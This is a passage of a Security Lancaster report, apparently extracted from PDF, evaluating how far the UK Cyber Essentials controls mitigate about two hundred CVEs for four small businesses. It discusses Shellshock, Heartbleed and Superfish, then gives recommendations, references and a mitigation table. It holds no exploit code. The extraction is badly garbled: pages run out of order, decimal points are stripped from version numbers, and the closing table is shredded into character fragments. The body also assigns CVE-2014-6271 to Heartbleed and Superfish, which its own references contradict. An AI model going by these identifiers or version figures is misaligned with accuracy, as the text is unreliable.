CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 25 of 28
an a3 01 5b ff byte sequence
CVE-2014-4631RSA Adaptive Authentication (On-Premise)6021 through 71 P3 when using devicebinding in a Challenge SOAP call orusing the RSA Adaptive AuthenticationIntegration Adapters with Out-of-BandPhone (Authentify) functionality conductspermanent device binding even whenauthentication fails which allows remoteattackers to bypass authentication
CVE-2014-5528The Appsflyer library for Android does notverify X509 certificates from SSL serverswhich allows man-in-the-middle attackersto spoof servers and obtain sensitiveinformation via a crafted certificate
CVE-2014-6040rdquoGNU C Library (aka glibc) before 220allows context-dependent attackers to causea denial of service (out-of-bounds readand crash) via a multibyte character valueof rdquordquo0xffffrdquordquo to the iconv function whenconverting (1) IBM933 (2) IBM935 (3)IBM937 (4) IBM939 or (5) IBM1364encoded data to UTF-8rdquo
CVE-2014-6105IBM Security Identity Manager 6x before6003 IF14 allows remote attackers toconduct clickjacking attacks via unspecifiedvectors
CVE-2014-6136IBM Security AppScan Standard 8x and 9xbefore 9011 FP1 supports unencryptedsessions which allows remote attackers toobtain sensitive information by sniffing thenetwork
CVE-2014-6164IBM WebSphere Application Server80x before 80010 and 85x before8554 allows remote attackers to spoofOpenID and OpenID Connect cookies andconsequently obtain sensitive informationvia a crafted URL
CVE-2014-6363rdquovbscriptdll in Microsoft VBScript 56through 58 as used with Internet Explorer6 through 11 and other products allowsremote attackers to execute arbitrarycode or cause a denial of service(memory corruption) via a crafted website aka rdquordquoVBScript Memory CorruptionVulnerabilityrdquordquordquo
CVE-2014-6369rdquoMicrosoft Internet Explorer 9 through 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquordquo
CVE-2014-6378Juniper Junos 114 before R12-S4 121X44before D35 121X45 before D30 121X46before D25 121X47 before D10 122before R9 122X50 before D70 123 beforeR7 131 before R4 before S3 131X49before D55 131X50 before D30 132before R5 132X50 before D20 132X51before D26 and D30 132X52 before D15133 before R3 and 141 before R1 allowsremote attackers to cause a denial of service(router protocol daemon crash) via a craftedRSVP PATH message
CVE-2014-6487Unspecified vulnerability in the OracleIdentity Manager component in OracleFusion Middleware 11115 1111711121 and 11122 allows remoteauthenticated users to affect integrity viaunknown vectors related to End User SelfService
CVE-2014-7250The TCP stack in 43BSD Net2 as usedin FreeBSD 54 NetBSD possibly 20 andOpenBSD possibly 36 does not properlyimplement the session timer which allowsremote attackers to cause a denial of service(resource consumption) via crafted packets
CVE-2014-7927The SimplifiedLoweringDoLoadBufferfunction in compilersimplified-loweringccin Google V8 as used in Google Chromebefore 400221491 does not properlychoose an integer data type which allowsremote attackers to cause a denial ofservice (memory corruption) or possiblyhave unspecified other impact via craftedJavaScript code
CVE-2014-7945OpenJPEG before r2908 as used inPDFium in Google Chrome before400221491 allows remote attackersto cause a denial of service (out-of-boundsread) via a crafted PDF document relatedto j2kc jp2c and t2c
CVE-2014-8447Adobe Reader and Acrobat 10x before10113 and 11x before 11010 on Windows
and OS X allow attackers to executearbitrary code or cause a denial of service(memory corruption) via unspecified vectorsa different vulnerability than CVE-2014-8445 CVE-2014-8446 CVE-2014-8456CVE-2014-8458 CVE-2014-8459 CVE-2014-8461 and CVE-2014-9158
CVE-2014-8638The navigatorsendBeacon implementationin Mozilla Firefox before 350 FirefoxESR 31x before 314 Thunderbird before314 and SeaMonkey before 232 omitsthe CORS Origin header which allowsremote attackers to bypass intended CORSaccess-control checks and conduct cross-site request forgery (CSRF) attacks via acrafted web site
CVE-2014-8835rdquoThe xpc data get bytes function in libxpcin Apple OS X before 10102 does not verifythat a dictionaryrsquos Attributes key has thexpc data data type which allows attackersto execute arbitrary code by providing acrafted dictionary to sysmond related toan rdquordquoXPC type confusionrdquordquo issuerdquo
CVE-2014-9159Heap-based buffer overflow in AdobeReader and Acrobat 10x before 10113and 11x before 11010 on Windows andOS X allows attackers to execute arbitrarycode via unspecified vectors a differentvulnerability than CVE-2014-8457 and CVE-2014-8460
CVE-2014-9163Stack-based buffer overflow in Adobe FlashPlayer before 1300259 and 14x and 15xbefore 1500246 on Windows and OS Xand before 112202425 on Linux allowsattackers to execute arbitrary code viaunspecified vectors as exploited in the wildin December 2014
CVE-2014-9350rdquoTP-Link TL-WR740N 4 with firmware3170 Build 140520 3166 Build 130529and 3164 Build 130205 allows remoteattackers to cause a denial of service(httpd crash) via vectors involving ardquordquonewrdquordquo value in the isNew parameter toPingIframeRpmhtmrdquo
CVE-2014-9357Docker 132 allows remote attackers toexecute arbitrary code with root privilegesvia a crafted (1) image or (2) build in aDockerfile in an LZMA (xz) archive relatedto the chroot for archive extraction
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 26 of 28
Survey Responses
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 27 of 28
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 28 of 28
Analysis of CyberEssentials on High ProfileVulnerabilitiesT
he following sections detail three ofthe high-profile vulnerabilities to hit thepopular media in late 2014 to early 2015
These are of particular note as while they maynot be the most damaging of attack vectors(although some are very serious) they havecaught the attention of the public and SMEswould be under pressure to ensure that theywere protected
With this in mind we analyse how effectivethe Cyber Essentials security controls are attackling these high-profile vulnerabilities
ldquoShellShockrdquo
Also known by the name ldquoBashDoorrdquoShellshock hit the news as it attacked theLinux server environment and did so in aparticularly effective manner
GNU Bash through 43 processestrailing strings after functiondefinitions in the values ofenvironment variables which allowsremote attackers to execute arbitrarycode via a crafted environment asdemonstrated by vectors involvingthe ForceCommand feature inOpenSSH sshd the mod cgi andmod cgid modules in the ApacheHTTP Server scripts executedby unspecified DHCP clients andother situations in which setting theenvironment occurs across a privilegeboundary from Bash execution akaldquoShellShockrdquo NOTE the originalfix for this issue was incorrect CVE-2014-7169 has been assigned tocover the vulnerability that is stillpresent after the incorrect fix
CVE-2014-6271[13]
The exploit allowed attackers to directlyexecute arbitrary shell commands on acompromised system by altering environmentvariables However the bug was not enoughby itself to actually enable attackers tocompromise a system but allowed accessvia other services While the exploit is onlyeffective if the bash environment can bealtered the results can be devastating asit lays bare the entire system to many otherforms of attack
The threat was particularly insidious forSMEs who used LinuxUnix based servers forservices mail servers as an example as theywould potentially have no idea that they hadbeen compromised
ldquoHeartbleedrdquo
Appearing in April 2014 the CVE-2014-6271(aka rdquoHeartbleedrdquo) bug allowed attackers todirectly read the active memory of a targetmachine through buffer over-read This thenallowed attackers to access private credentials(or indeed anything else) in the RAM of thetarget
As described in the original CVE report
The (1) TLS and (2) DTLSimplementations in OpenSSL 101before 101g do not properlyhandle Heartbeat Extension packetswhich allows remote attackers toobtain sensitive information fromprocess memory via crafted packetsthat trigger a buffer over-read asdemonstrated by reading privatekeys related to d1 bothc andt1 libc aka the Heartbleed bug
CVE-2014-6271[12]
As OpenSSL is a core part of manyapplications and services both in the openand closed source world this vulnerabilityhad the potential to damage a huge numberof systems At the time of release varioussources (including for example Netcraft[15])that up to 17 of trusted SSL-certified serverswere vulnerable to the attack
Depending on how the SME in questionoperates the threat this particular CVE posed(and indeed still poses with still as yetto be updated servers still online with thevulnerability) is difficult to discern Obviouslythe vulnerability is serious but the ability ofindividual SMEs to detect and correct this flawwill vary greatly depending on the individualdeployments
Larger companies with their ownLinuxUnix servers may have be able to deploythe patched OpenSSL version as soon as thepatch was available but smaller businesses
or those with more cloud-based services maynot have access to the software running onthe servers they use and may be at the mercyof the respective operators to implement thefix Because of this patch management onlypartially remedies this vulnerability and otherprotection methods from the Cyber Essentialsguidelines such as securing configurations orcontrolling access will have unknown effects
It is vulnerabilities such as this that posethe greatest threat to SME networks as themethods to fix the issue are often outside thecontrol of the company potentially leavingthem vulnerable far longer than one wouldexpect
ldquoSuperfishrdquo
The SDK for Komodia Redirectorwith SSL Digestor as usedin Lavasoft Ad-Aware WebCompanion 118851766 and Ad-Aware AdBlocker (alpha) 13691Qustodio for Windows AtomSecurity Inc StaffCop 58 andother products uses the sameX509 certificate private key fora root CA certificate across differentcustomersrsquo installations whichmakes it easier for man-in-the-middleattackers to spoof SSL servers byleveraging knowledge of this keyas originally reported for SuperfishVisualDiscovery on certain LenovoNotebook laptop products
CVE-2014-6271[14]
This vulnerability is particularly interestingas the software causing the issue waseffectively brokered by a trusted hardwarevendor namely Lenovo Because the issuewas part of the lsquonormal configurationrsquo forthe equipment it remained undetected fora long time and hints that there may befurther breaches in security as yet undiscoveredin both Lenovo and other manufacturerrsquosequipment
The vector is through the SuperFishsoftware essentially breaking the chain of trustfor SSL certificates by installing a self-signingcertificate in to the list of trusted certificateson the host machine This allows an attackerto simply sign their own code via the same
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 10 of 28
certificate which itself can be easily gatheredfrom any other machine running SuperFishand they have full access to any SSL-securedconnection from the target machine
Thankfully while the risks to users andSMEs was high the fix is a simple one-timerun of a removal tool provided by Lenovothemselves[11] and is mitigated fully throughthe Cyber Essentials patch managementadvice
Threat Analysis
ShellShock Without Cyber Essentials inplace SME 1 and 2 would be at risk fromlsquoShellshock as they both operate UnixLinuxbased systems that would require patching toplug the security issue The extent at whichSMEs 3 and 4 are vulnerable to this issue isunclear as their large dependency on outside
service providers leaves them in a positionwhere they are both unable to determine theirvulnerability and additionally unable to remedyit
With Cyber essentials SME 1 and 2 wouldbe fully protected and it is likely that SME3 and 4 are also protected if the externalproviders also use a Cyber Essentials or othersecurity and patching schemes
Heartbleed The lsquoHeartbleedrsquo bug is anothervulnerability that without Cyber Essentialsguidelines being followed would have laidcompanies external-facing services open tomalicious attackers
In all cases however each SME can befully protected with a combination of patchmanagement firewalling and application ofaccess controls from the Cyber Essentialsguidelines
SuperFish All of the SMEs we interviewedcould be exceedingly vulnerable to thelsquoSuperfishrsquo issue without Cyber Essentialsas much of their operations revolve aroundSSL encrypted communications A break inthe chain-of-trust for their certificates wouldallow an attacker to man-in-the-middle theircommunications
Normal system updates would have failedto remedy the situation as the fix providedby Lenovo consisted of a tool to be runin addition to the normal operating systempatches It is further debatable how effectiveCyber Essentials patch management wouldhave been in plugging this vulnerability as itwould require that the administrators be awareof the issue and know of the patch rather thansimply following lsquonormalrsquo patching guidelinesAssuming that the persons responsible for theequipment are aware of the issue howeverthen Cyber Essentials patch management fullymitigates this issue
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 11 of 28
ConclusionsT
he Cyber Essentials Security Tools havebeen shown to mitigate or to mitigateas soon as a patch is released all
vulnerabilities from remote attackers that donot exploit fundamentally insecure software orhardware Of the two-hundred vulnerabilitiescollected eight exploits were not able tobe resolved with the deployment of securitypatches for vulnerabilities such as these theonly mitigation available is simply not to installthe compromised systems To help preventdeployments being susceptible to attacks onfaulty systems it may be recommended that ablacklist of such items is composed for publicreference
Scope It is important to consider that thescope of this study covers only internet-basedcommodity-level attacks and although theCyber Essentials tools performs very well inmitigating this it does not represent fullsecurity There is an increasingly identifiedrisk from insiders that also requires attentionnot least malicious acts but also from usersunknowingly compromising security
The SMEs interviewed representorganisations from a range of market sectorsin web development and online presencespecialist scientific services the hospitalityindustry and finance
Additional Tools
The 10 Steps to Cyber Security[2] identifiesadditional security measures that supportthe Cyber Essentials Scheme well todeliver additional security through indirectmeasures such as User Education Awarenessalong with Network and Systems MonitoringThese additional measures would serve tobolster cyber security through fortifyingeach employee of the SME with necessaryknowledge on safe practice itrsquos importanceand some technical basic understanding -just as they may be versed in environmentalawareness Network and Systems Monitoringallows for remote user logins as well as fileaccess and activity to be logged For verysmall networks this may be currently infeasibleas the extra manpower or finances required for
such a system are costly However for largeorganisations additional monitoring capabilityshould be explored as a future extension tothe Cyber Essentials not just to identify andmitigate malicious action for more bespokeand sophisticated attacks than those reportedon but to also aid in providing evidence forany potential cyber-crime investigations
There exist some collective approaches toimproving cyber-security a notable example ofthis is The Cyber-security Information SharingPartnership (CiSP)[4] The partnership aimsto benefit all members by providing real-time updates on issues of cyber-securityand discovered vulnerabilities as well asbest-practice guides and other cyber-threatinformation It would be beneficial formore organisations to belong to cyber-securitycollectives like this creating networks ofinformed individuals working together to tacklecyber-crime This would be particularly usefulto quickly identify potential vulnerabilitiesand possible patches which as shown inthis report is critical for the CE patchmanagement security control to fully mitigaterelated vulnerabilities
An important note to be made is towardthe security of business affiliates and serviceproviders Even if an SME has CyberEssentials in place any use of cloud-servicesrelies on the vendorrsquos security controls forthreat mitigation In other words cloud-email accounting and any other cloud-basedor remote services are only as secure as theservice provider makes it In general cloud-providers should be holding a high level ofscrutiny to their security practice and shouldbe encouraged to certify their protectionHewlett-Packard(HP) has taken this furtherand has begun to strengthen itrsquos entire supply-chain ( 600 SMEs) with the Cyber Essentialsaccreditation This provides protection acrossthe entirety of Hewlett Packardrsquos operationsas well as itrsquos affiliates This should be agoal for organisations of all sizes minimisingthe risk from cyber-threats by ensuring alltrading partners uphold the same high levelsof security
Cyber Essentials Controls
Of the five current Cyber Essentials ControlsPatch Management was considered to aid inthe mitigation of the highest proportion ofremote attacks (875 ) counter-intuitivelythe Survey responses had patch managementranked last in use for SMEs The highestcurrently used controls could be seen asthose providing the most intuitive or easilyunderstood protection Data loss preventionstrong passwords and firewall While patchmanagement isnrsquot necessarily understood byindividuals as a tool to greatly improve cyber-security
Anti-Malware was useful in mitigating theleast (10 ) vulnerabilities It is howeverimportant to note that Anti-Malware is largelythe only security tool that may routinely scanthe network hardware and software as wellas any items downloaded from the internetor as email attachments This serves as alast line of defence and as such is vital to anorganisationrsquos cyber-safety
Recommendations
To further improve cyber-security across theUK we recommend that
1 Collective approaches to cyber securityshould be further encouraged Inparticular a governmentalcollectiveapproach to identifying inherently flawedproducts should be developed Thiscould be in addition to or as an extensionto current initiatives like CiSP whichcan make a difference in detecting andreacting on potential vulnerabilities in atimely manner
2 Further research into the mitigation ofother cyber-threats is carried out toexplore the risk from insider-threats andtargeted attacks
3 Further employee education is stronglyencouraged specially to be able totackle these other types of attacksmentioned above which were not underthe scope of this report
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 12 of 28
References[1] Centre for the Protection of
National Infrastructure CESGCabinet Office InnovationDepartment for Business andSkills Cyber security guidance forbusiness httpswwwgovuk
governmentpublicationscyber-
risk-management-a-board-level-
responsibility September 2012
[2] Centre for the Protection ofNational Infrastructure CESGCabinet Office and Innovation amp SkillsDepartment for Business 10 stepsto cyber security httpswwwgov
ukgovernmentpublicationscyber-
risk-management-a-board-level-
responsibility September 2012
[3] Innovation CESG UK Trade ampInvestment Prime Ministerrsquos Office10 Downing Street Centre for theProtection of National InfrastructureGovernment CommunicationsHeadquaters UK Trade amp Departmentfor Business and Skills Cyber securityboost for uk firms httpswww
govukgovernmentnewscyber-
security-boost-for-uk-firmsJanuary 2015
[4] Centre for the Protection ofNational Infrastructure CiSPCERT-UK and Innovation amp SkillsDepartment for Business Cyber-securityinformation sharing partnership (cisp)httpswwwcertgovukcispMarch 2013
[5] CREST Cyber essentialscertified companies http
wwwcyberessentialsorglistMarch 2015
[6] CVEMitreorg Terminology - mitreorghttpcvemitreorgabout
terminologyhtml
[7] Cyber Essentials Cyber essentialsscheme - overview httpswwwgov
ukgovernmentpublicationscyber-
essentials-scheme-overview
[8] CESG Cabinet Office Centre for theProtection of National InfrastructureDepartment for Business Innovationamp Skills Common cyber attacksReducing the impact https
wwwgovukgovernmentuploads
systemuploadsattachment_data
file400106Common_Cyber_Attacks-
Reducing_The_Impactpdf January2015
[9] UK Cyber Security Forum Northwest cyber security clusterhttpwwwukcybersecurityforum
comindexphpcyber-security-
clustersnorth-west-lsquo-cluster2015
[10] HM Government Cyber essentialscertified companies https
wwwgovukgovernmentuploads
systemuploadsattachment_data
file400914bis-15-72-cyber-
essentials-scheme-assurance-
frameworkpdf January 2015
[11] Lenovo Superfish uninstall instructionshttpsupportlenovocomus
enproduct_securitysuperfish_
uninstall
[12] Mitreorg Cve-2014-0160 akaheartbleed httpcvemitreorg
cgi-bincvenamecginame=CVE-
2014-0160 2014
[13] Mitreorg Cve-2014-6271 akashellshock httpcvemitreorg
cgi-bincvenamecginame=CVE-
2014-6271 2014
[14] Mitreorg Cve-2015-2077 aka superfishhttpcvemitreorgcgi-bin
cvenamecginame=CVE-2015-20772015
[15] Netcraft Half a million widely trustedwebsites vulnerable to heartbleedbug httpnewsnetcraftcom
archives20140408half-a-
million-widely-trusted-websites-
vulnerable-to-heartbleed-
bughtml April 2014
[16] Cabinet Office The uk cyber securitystrategy - protecting and promotingthe uk in a digital world https
wwwgovukgovernmentuploads
systemuploadsattachment_data
file60961uk-cyber-security-
strategy-finalpdf November 2011
[17] Cabinet Office and The Rt HonFrancis Maude MP Governmentmandates new cyber security standardfor suppliers httpswwwgov
ukgovernmentnewsgovernment-
mandates-new-cyber-security-
standard-for-suppliers September2014
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 13 of 28
Cyb
erC
ontr
ols
App
licab
ility
CV
ES
ME
1S
ME
2S
ME
3S
ME
4Id
ealis
edN
oC
EW
ith
CE
CV
E-2
01
3-0
00
8y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n(U
ser
Po
licy)
A
nti
-Mal
war
eC
VE
-20
13
-00
22
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-00
84
yy
yn
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tS
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
W
ebsi
teB
lack
listi
ng
CV
E-2
01
3-0
14
0y
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-0
14
9n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n
Pat
chM
anag
emen
tC
VE
-20
13
-01
72
yn
nn
nN
ot
Mit
igat
edM
itig
ated
-U
ser
Acc
ess
(Str
on
gP
assw
ord
)P
atch
Man
agem
ent
CV
E-2
01
3-0
17
4n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Acc
ess
Po
licy
(Str
on
gP
assw
ord
)F
irew
all
Pat
chM
anag
emen
tC
VE
-20
13
-01
99
yn
nn
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
ampS
ecu
reC
on
fig
ura
tio
nC
VE
-20
13
-02
53
nn
yn
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Ser
ver)
CV
E-2
01
3-0
27
0n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-0
48
1n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-0
59
8n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-0
61
9y
yy
yy
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-0
63
3y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
sin
g)
Fir
mw
are
Man
agem
ent
CV
E-2
01
3-0
64
9y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
sin
g)
Pat
chM
anag
emen
tC
VE
-20
13
-07
46
yy
yy
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
13
-07
53
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-07
87
yy
yy
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-0
90
9y
yy
yy
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-1
03
5y
yy
yn
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tS
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
W
ebsi
teB
lack
listi
ng
CV
E-2
01
3-1
10
2n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n
Pat
chM
anag
emen
tC
VE
-20
13
-11
40
nn
nn
nN
ot
Mit
igat
edN
ot
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
(Do
nrsquot
inst
all)
CV
E-2
01
3-1
14
4n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
ampF
irew
all
CV
E-2
01
3-1
15
3y
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
CV
E-2
01
3-1
18
1n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n
Pat
chM
anag
emen
tC
VE
-20
13
-13
03
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-13
84
yy
yy
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tS
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
CV
E-2
01
3-1
38
8n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
CV
E-2
01
3-1
45
0y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
P
atch
Man
agem
ent
CV
E-2
01
3-1
47
2y
yy
yn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Acc
ess
Po
licy)
CV
E-2
01
3-1
55
3y
ny
yn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-1
62
0y
yy
yn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
ampF
irew
all
CV
E-2
01
3-1
62
7n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-1
63
8y
yy
yn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-1
66
9y
yy
yy
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-1
67
6y
yy
yy
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-1
70
0y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n
Pat
chM
anag
emen
tA
nti
-Mal
war
eC
VE
-20
13
-17
34
nn
nn
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
13
-17
77
nn
yn
nN
ot
Mit
igat
edM
itig
ated
-F
irew
all
Pat
chM
anag
emen
tC
VE
-20
13
-23
19
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
C
VE
-20
13
-23
40
nn
nn
nN
ot
Mit
igat
edN
ot
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
(Do
nrsquot
inst
all)
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 14 of 28
CV
ES
ME
1S
ME
2S
ME
3S
ME
4Id
ealis
edN
oC
EW
ith
CE
CV
E-2
01
3-2
35
0n
yn
ny
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
ampF
irew
all
CV
E-2
01
3-2
49
2y
ny
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n
Pat
chM
anag
emen
tC
VE
-20
13
-25
07
yn
nn
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Fir
mw
are
Man
agem
ent
An
ti-M
alw
are
CV
E-2
01
3-2
73
6y
yy
yy
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-2
78
0n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n
Pat
chM
anag
emen
tC
VE
-20
13
-28
03
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-S
tro
ng
Pas
swor
ds
Pat
chM
anag
emen
tsC
VE
-20
13
-28
24
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-F
irew
all
Sec
ure
Co
nfi
gu
rati
on
P
atch
Man
agem
ent
CV
E-2
01
3-2
82
6n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n
Pat
chM
anag
emen
tC
VE
-20
13
-29
20
ny
yy
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
13
-30
64
yn
nn
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-31
16
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-31
37
yy
yy
nN
ot
Mit
igat
edM
itig
ated
-A
nti
-Mal
war
eS
ecu
reC
on
fig
ura
tio
n(D
on
rsquotIn
stal
l)C
VE
-20
13
-31
94
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-31
99
yn
yy
yN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-32
01
yn
yy
yN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-32
06
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-32
80
nn
nn
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tamp
Sec
ure
Co
nfi
gu
rati
on
CV
E-2
01
3-3
38
7n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n
Pat
chM
anag
emen
tC
VE
-20
13
-34
17
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
W
ebsi
teB
lack
listi
ng
CV
E-2
01
3-3
63
2y
yy
nn
No
tM
itig
ated
Mit
igat
ed-
Acc
ess
Po
licy
(Str
on
gP
assw
ord
)F
irew
all
CV
E-2
01
3-3
65
6n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-3
85
6y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tF
irew
all
An
ti-M
alw
are
CV
E-2
01
3-3
86
0y
yy
yy
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-3
89
3y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tS
ecu
reC
on
fig
ura
tio
n-
no
JS
CV
E-2
01
3-3
89
7y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-39
00
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-F
irew
all
Sec
ure
Co
nfi
gu
rati
on
P
atch
Man
agem
ent
CV
E-2
01
3-3
90
5y
yn
yn
No
tM
itig
ated
No
tM
itig
ated
-S
ecu
reC
on
fig
ura
tio
n(D
on
rsquotin
stal
l)C
VE
-20
13
-42
23
yn
nn
nN
ot
Mit
igat
edN
ot
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
(Do
nrsquot
inst
all)
CV
E-2
01
3-4
43
6n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
P
atch
Man
agem
ent
CV
E-2
01
3-4
47
8n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tS
ecu
reC
on
fig
ura
tio
nC
VE
-20
13
-45
29
nn
nn
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
